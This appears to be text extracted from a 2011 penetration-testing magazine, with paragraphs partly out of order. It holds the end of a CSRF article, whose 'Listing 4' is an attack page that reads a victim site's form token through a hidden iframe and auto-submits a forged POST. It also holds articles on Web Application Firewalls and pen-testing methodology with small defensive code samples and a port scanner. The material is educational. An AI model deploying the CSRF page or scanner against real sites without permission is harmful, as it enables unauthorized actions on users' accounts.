Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. Then he seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks, such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script type="text/javascript">
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands, can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms, up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end, this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place, or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you do not need to be highly skilled to use the internet. This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for acting anonymously. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies, particularly in the first years of web usage.
Figure 1: This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now, the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better; instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system, or the database from web applications that give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would then also have to raise the security of older web applications to the required standards retroactively.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of introducing mistakes. Another example is programs that do not use just the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
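The Session Fixation point can be illustrated with a short sketch. The `SessionStore` class below is purely hypothetical (it belongs to no real framework); the essential step is that `login()` discards the pre-login session ID and issues a fresh one:

```python
import secrets

# Hypothetical in-memory session store, sketched only to show why the
# session ID must be regenerated after authentication.
class SessionStore:
    def __init__(self):
        self.sessions = {}  # session_id -> session data

    def create_session(self):
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None, "authenticated": False}
        return sid

    def login(self, old_sid, user):
        # Discard the pre-login ID: an attacker who planted ("fixated")
        # that ID can no longer ride the authenticated session.
        self.sessions.pop(old_sid, None)
        new_sid = secrets.token_hex(16)
        self.sessions[new_sid] = {"user": user, "authenticated": True}
        return new_sid

store = SessionStore()
anonymous_sid = store.create_session()   # ID possibly known to an attacker
auth_sid = store.login(anonymous_sid, "alice")
assert anonymous_sid != auth_sid         # the fixated ID is now worthless
assert anonymous_sid not in store.sessions
```

An application that keeps the same session attribute across the login boundary cannot make this swap easily, which is exactly the retrofitting problem described above.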
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality, and security still has top priority: the more safely a web application is written, the lower the improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe, but even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF, it is still recommended to check the security functions, as conducted by penetration testers. This might reveal, for example, that the system can be misused by SQL Injection by entering single quotes. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the quotes out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis: that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
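As a sketch of why quote filtering alone is insufficient, consider a deliberately naive filter (the `naive_waf_filter` function below is illustrative, not a real WAF rule):

```python
# Illustrative sketch (not a real WAF): a naive rule that only strips
# single quotes, and two probes showing its limits.
def naive_waf_filter(value: str) -> str:
    return value.replace("'", "")

probes = {
    "classic quote": "' OR '1'='1",
    "numeric, no quotes": "1 OR 1=1--",
}

filtered = {name: naive_waf_filter(p) for name, p in probes.items()}
assert "'" not in filtered["classic quote"]            # quote probe is neutered
assert filtered["numeric, no quotes"] == "1 OR 1=1--"  # passes through untouched
```

A numeric injection needs no quote at all, so a rule set has to combine character filtering with parameter typing and length rules, and a penetration test should probe both variants.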
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load balancing in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In this way the length and the contents of parameters can also be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters, and permitted value range.
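Such general parameter rules can be sketched as follows; the rule format (`count`, `max_len`, `allowed`) is an illustrative assumption, not a real WAF configuration syntax:

```python
import re

# Sketch of the general parameter rules described above (hypothetical
# rule format): expected parameter count, max length, permitted characters.
FORM_RULES = {
    "count": 2,
    "max_len": 32,
    "allowed": re.compile(r"^[A-Za-z0-9 @._-]*$"),
}

def check_request(params: dict, rules=FORM_RULES) -> bool:
    if len(params) > rules["count"]:
        return False                      # three or more parameters: block
    return all(
        len(v) <= rules["max_len"] and bool(rules["allowed"].match(v))
        for v in params.values()
    )

assert check_request({"user": "alice", "email": "a@example.com"})
assert not check_request({"user": "a", "email": "b", "extra": "c"})
assert not check_request({"user": "<script>alert(1)</script>", "email": "x"})
```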
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. Fully developed rate-limiting rules with finely adjustable guidelines also eliminate the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan, or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
Figure 2: An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application; as a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g., for standard usages like Outlook Web Access, SharePoint, or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
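A minimal sketch of that combined model might look like this (the path names, rule format, and patterns are all illustrative assumptions, not a vendor's syntax):

```python
import re

# Sketch of the combined model: a negative-security blacklist for the
# whole site, plus a strict whitelist on one high-value path.
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select", r"\.\./")]
WHITELISTED_PATHS = {
    "/order/entry": {"item_id": re.compile(r"^\d{1,6}$"),
                     "qty": re.compile(r"^\d{1,3}$")},
}

def allow(path: str, params: dict) -> bool:
    profile = WHITELISTED_PATHS.get(path)
    if profile is not None:  # high-value page: whitelist only
        return set(params) <= set(profile) and all(
            bool(profile[k].match(v)) for k, v in params.items())
    # everywhere else: negative security model (blacklist)
    return not any(rule.search(v) for v in params.values() for rule in BLACKLIST)

assert allow("/order/entry", {"item_id": "42", "qty": "2"})
assert not allow("/order/entry", {"item_id": "42 OR 1=1", "qty": "2"})
assert not allow("/search", {"q": "<script>alert(1)</script>"})
assert allow("/search", {"q": "red shoes"})
```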
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that appear to violate the policies but, based on extensive heuristic analysis, can still be categorized as legitimate. At the same time, the exception profiler suggests exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode, the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.

The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and some special functions are available only in this mode. As a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But Proxy WAFs must also be configured in line with the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there at least simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context, the principle of least privilege applies: users are awarded only those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory, or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand, and easy to set, then this in practice makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.

In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance, and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
WEB APP SECURITY
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, Cold Fusion, and Flash. These applications expose financial data, customer information, and other sensitive and confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level of such applications. With the accessibility of such critical data from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge of and experience in a variety of different tools and a range of exploits that can achieve the required tasks.

During pen testing, different web application vulnerabilities are tested (e.g., Input Validation, Buffer Overflow, Cross Site Scripting, URL Manipulation, SQL Injection, Cookie Modification, Bypassing Authentication, and Code Execution). A typical pen test involves the following procedures:
• Identification of Ports – In this process, ports are scanned and the associated running services are identified.
• Software Services Analyzed – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real and that the weaknesses might be exploited, in order to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
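The port-identification step can be sketched as a plain TCP connect scan. In practice testers use a dedicated scanner such as Nmap; the sketch below only shows the principle, and must of course only be pointed at hosts you are authorized to test:

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Sketch of the port-identification step: a simple TCP connect scan.
def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0  # 0 means the connect succeeded

def scan(host: str, ports) -> list:
    # Probe ports concurrently and return the open ones, sorted.
    with ThreadPoolExecutor(max_workers=32) as pool:
        results = pool.map(lambda p: (p, port_open(host, p)), ports)
    return sorted(p for p, is_open in results if is_open)

# Example (hypothetical target): scan("scanme.example", [22, 80, 443])
```

Once the open ports are known, the services behind them are identified, which is where the manual analysis of the next step begins.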
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects can be reduced, and the severity of any defects that do remain undetected can be reduced or eliminated. Although these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence, put anomalies into context, or make normative judgments about them, the struggle to find certain vulnerabilities will continue.
Web Application Security and Penetration Testing

In recent years, web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit vulnerabilities to determine whether unauthorized access or other malicious activities are possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access to these doors (i.e., port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application using automated systems and tools or manual processes. The security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the countermeasures that need to be implemented are identified. It is imperative that web application security be thought of as another quality vector of every application, one that has to be considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automated process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used
Web application vulnerability types can be grouped into two categories:

Technical Vulnerabilities
Such vulnerabilities can be examined through tests such as Cross-Site Scripting, Injection Flaws, and Buffer Overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests are. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future either. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
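What such a scanner does for a technical vulnerability like reflected XSS can be reduced to a small sketch: inject a unique marker and check whether it comes back unescaped. The page strings below stand in for real HTTP responses:

```python
import html

# Minimal sketch of an automated reflected-XSS check: a unique marker is
# injected and the response body is inspected for an unescaped reflection.
MARKER = '"><xss-probe-1234>'

def reflected_unescaped(response_body: str) -> bool:
    return MARKER in response_body          # the raw marker came back verbatim

# A page that escapes its output does not reflect the raw marker:
safe_page = "<p>You searched for: %s</p>" % html.escape(MARKER)
vulnerable_page = "<p>You searched for: %s</p>" % MARKER

assert not reflected_unescaped(safe_page)
assert reflected_unescaped(vulnerable_page)
```

This mechanical check is exactly what tools do well; the workflow-dependent cases listed above are where they fail, which motivates the logical category that follows.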
Logical Vulnerabilities
Such vulnerabilities can manipulate the logic of the application to perform tasks that were never intended to be done. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C, bypassing the security validation that exists at point B.
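The A-to-C bypass can be modeled in a few lines. The handlers below are an illustrative toy, not a real application; the flaw is simply that the final step never checks whether the validation step was passed:

```python
# Toy workflow: step B sets a "validated" flag that step C should require.
def handle_broken(step, session):
    if step == "B":
        session["validated"] = True
    return "200"                  # flaw: C never checks the flag

def handle_fixed(step, session):
    if step == "C" and not session.get("validated"):
        return "403"              # forced browsing straight to C is rejected
    if step == "B":
        session["validated"] = True
    return "200"

# The manual test: request C directly, skipping the validation at B.
assert handle_broken("C", {}) == "200"   # bypass succeeds: a logic flaw
assert handle_fixed("C", {}) == "403"    # the validation at B is enforced
```

An automated scanner crawling links would typically traverse A, B, C in order and never notice that C is reachable out of order, which is why this class of flaw needs a human tester.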
History has proven that software bugs, defects, and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks, and application information. It is also proven that most security breaches occur due to vulnerabilities within the web application layer (i.e., attacks using the HTTP/HTTPS protocols). In such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application, or web services platform. Part of the analysis work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g., third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application; such an assessment exposes the vulnerabilities most likely to be exploited
Figure 1: The different activities of the Pen Testing processes
and allows the team to find similar instances of vulnerabilities throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, where the resources under test are accessed remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g., commercial enterprise web applications, internally developed applications, web-based portals, and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process. The testing processes used to achieve the security vulnerability assessment include Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment, and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:

• Zero-Knowledge Test (Black Box) – In this approach, the application security testing team does not have any inside information about the target environment, and the expected knowledge gain is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under testing is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach, the penetration test team has full information about the application and its source code. In such a test, the security team does a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be performed through two different types of testing:

• External Penetration Testing
• Internal Penetration Testing

Both types of testing can be conducted with no prior information (black box) or with full information (white box).
Figure 2: The different phases of the Pen Testing process
Figure 3 shows different procedures and steps that can be used to conduct the penetration testing. The following describes these steps:
• Scope and Plan – In this step, the scope of the penetration testing is identified and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning under the defined scope of the project is conducted, where the automated scanners examine the open ports and scan the system to detect vulnerabilities; hostnames and IP addresses previously collected are used at this stage.
• Creation of Attack Strategies – In this step, the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step, the exploitation of vulnerabilities using the automated tools is conducted, where the attack methods designed in the previous phase are used to conduct the following tests: data & service pilferage test, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step, all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools will allow the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques, procedures and steps
WEB APP SECURITY
• Authentication and Session Management (Session ID flaws) Vulnerabilities
• Cross Site Scripting (XSS) Vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing for the above vulnerabilities is performed, except for those that could cause Denial of Service conditions, which are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. At this point the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing:
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool usually examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility of port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
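The core idea can be sketched in a few lines of Ruby: a plain TCP connect scan that reports which of a given set of ports accept a full connection. The host and port list here are illustrative; real scanners such as Nmap add UDP scanning, OS fingerprinting, and stealth techniques on top of this basic mechanism.

```ruby
require 'socket'
require 'timeout'

# Minimal TCP connect scan: a port counts as open if a full TCP
# connection can be established within the timeout.
def open_ports(host, ports, timeout = 1)
  ports.select do |port|
    begin
      Timeout.timeout(timeout) { TCPSocket.new(host, port).close }
      true
    rescue StandardError
      false # refused, unreachable, or timed out => treat as closed/filtered
    end
  end
end

# Example usage against the local machine:
puts open_ports('127.0.0.1', [22, 80, 443, 8080]).inspect
```

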